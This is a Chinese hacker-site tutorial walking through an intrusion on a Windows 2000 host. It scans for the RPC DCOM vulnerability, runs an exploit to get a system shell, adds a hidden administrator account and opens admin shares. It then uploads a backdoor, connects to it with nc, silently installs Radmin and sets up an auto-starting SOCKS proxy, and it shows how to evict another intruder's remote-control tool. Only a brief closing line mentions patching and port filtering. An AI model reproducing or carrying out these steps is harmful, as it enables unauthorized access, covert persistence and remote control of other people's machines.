设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 黑客技术 -> 文章内容 [站内搜索]  

 
一步一步的入侵----only for you
作者:不详  来源:网络  发布时间:2008-3-5 9:17:27  发布人:www.hack86.com
一步一步的入侵----only for you 
 
大家好,现在网上很流行dcomrpc,哈哈,那好就说说利用dcomrpc入侵。很入侵之后做的事情  

需要的工具:  
很好的:radmin.exe  
扫描工具: retinarpcdcom.exe  
溢出攻击工具:RpcDcom(通用溢出工具)  
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe  
代理:sksockserver.exe  
后门程序:WinEggDropShellPro3thVersion  

好了,该做的都做的差不多了。现在开始把~~  

首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必  

随便扫一下就会发现有许多主机开放的135端口)。。。。。。  

(人走运座着都能检到钱) 211.217.50.xx第一个主机就被扫出来又此漏洞。开始工作  

看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有  
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k  

哈哈,是win2k server版本  


展开命令行:  

[查看dcomrpc的用法用法 dcomrpc -d <host> [options] ]  

F:\hack>cd rpc\dcomrpc  

RPC DCOM Expl01t coded by .:[oc192.us]:. Security  

Complied and Modified by Expl01t www.longker.com  

Usage:  

dcomrpc -d <host> [options]  
Options:  
 -d:Hostname to attack [Required]  
 -t:Type [Default: 0]  
 -r:Return address [Default: Selected from target]  
 -p:Attack port [Default: 135]  
 -l:Bindshell port [Default: 666]  

Types:  
 0 [0x0018759f]: [Win2k-Universal]  
 1 [0x0100139d]: [WinXP-Universal]  


开始进行溢出:  
F:\hack>cd rpc\dcomrpc -d211.217.50.xx 0  

RPC DCOM remote expl01t - .:[oc192.us]:. Security  
Complied and recorrected by Expl01t www.longker.com  
[+] Resolving host..  
[+] Done.  
[+] Expl01ting....Just wait......  

等到出现,说明溢出成功  
c:\winnt\system32>  

接着我们建立用户  

c:\winnt\system32>net user blueye$Content$nbsp;1111 /add  
命令成功完成。  

把用户添加成超级管理员  
c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add  
命令成功完成。  


看看共享开了没有,没有的话把共享开开  

c:\winnt\system32>net share  
清单是空的。  

c:\winnt\system32>net share ipc$Content$nbsp; 
命令成功完成。  
c:\winnt\system32>net share admin$Content$nbsp; 
命令成功完成。  

到这里我们入侵告一段落  


[ 建 立 IPC$Content$nbsp;连 接 ,也可以使用tftp上传 ,先和对方建立连接]  

F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp; 

[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]  

F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32  

F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32  

然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet  
使用opentelnet.exe 关闭开启的telnet使用resumetelnet \\ip user password  
如果忘记开共享可以使用脚本开启telnet来开共享,用法:  
cscript telnet.vbe ip user password null port (null是验证方式)  

F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567  

F:\hack>telnet 211.217.50.xx 4567  
省略...  

连接并运行后门程序,运行后门程序命令根目录:inject.exe -run  
(后门使用方法和安装都在zip文件里面包含了)  

后门端口123456  
F:\hack>nc 211.217.50.xx 123456  


Welcome To WinEggDropShell Matrix Version  

[Melody]#  



下面安装radmin  

配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章  
radmin.reg  
raddrv.dll  
admdll.dll  
r_server.exe  

把这个4个文件copy c:\winnt\system32  

在目录下面执行命令  
c:\winnt\system32>r_server /s radmin.reg -----导入注册表  

c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘  

c:\winnt\system32>net start r_server----- 启动服务  


可以开启3389的话你自己看着办把,哈哈  


安装sock代理  
把sksockserver.exe copy c:\winnt\system32  

c:\winnt\system32>sksockserver /install-----安装服务  

c:\winnt\system32>sksockserver -config port 1234----端口定在1234自己可以改  

c:\winnt\system32>sksockserver -config starttype 2----开机自动启动  

c:\winnt\system32>net start skserver ----启动服务  



最后删除共享  
net share ipc$Content$nbsp;/del  
net share admin$Content$nbsp;/del  




在安装radmin的时候你发现有人已经安装了。。怎么办?走人?--------NO  


看操作 (我输入的内容)  

后门连接  

F:\hack>nc 211.217.50.xx 123456  


Welcome To WinEggDropShell Matrix Version  

[Melody]#(pslist)  

[Melody]#(pskill r_server)  

[Melody]#(shell)  

c:\winnt\system32>(del r_server.exe)  

c:\winnt\system32>(del admdll.dll)  

c:\winnt\system32>(del raddrv.dll)  


copy你自己的上去,然后安装  

省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密  

码  


等等。。。。为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的 。  

完了,努力白费了。。。。。。。 -----------------------------NO  

出现这样的情况最简单的解决办法telnet上去导入试试看,什么?不是把,有没有搞错阿。。。  

呵呵,尽管放心,去试试看就知道;还可以先运行radmin 然后在radmin的dos下导入,也是可以的  

嗬嗬,去试试看吧  


防御办法:  
安装rpc补丁  
使用防火墙过滤135,445,139等端口  

[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  抵御黑客的入侵 进..
推荐:抵御黑客的入侵..
一步一步学如何防范..
漏洞分类及进一步发..
推荐:别杀错了:一步..
Google的下一步收购..
多管齐下,一步一步揪..
进一步的防范 小技..
一步一步教你搞网站..
[组图] 一步一步学习..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
8款QQ空间免费开场动画
18岁少女欲6000元卖处女身 救患血..
免费QQ蓝钻体验(附考试答案)
 
金山百度打造中国互联网最大免费.. 03-12
微软设计师:不会急于合并雅虎技.. 03-12
Digg为何值Google掏2亿美元收购 03-12
价格跳水 微软破解Vista迷局之法.. 03-12
大行其道 手机改号软件网上泛滥 03-12
很恐怖 新标准测试 IE8 仅17分 03-12
逆向病毒nvmini.sys--编译通过--.. 03-12
安徽33位代表拟联名建言尽快出台.. 03-12
安徽33位代表拟联名建言尽快出台.. 03-12
中国黑客指美媒体“瞎说” 03-12
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com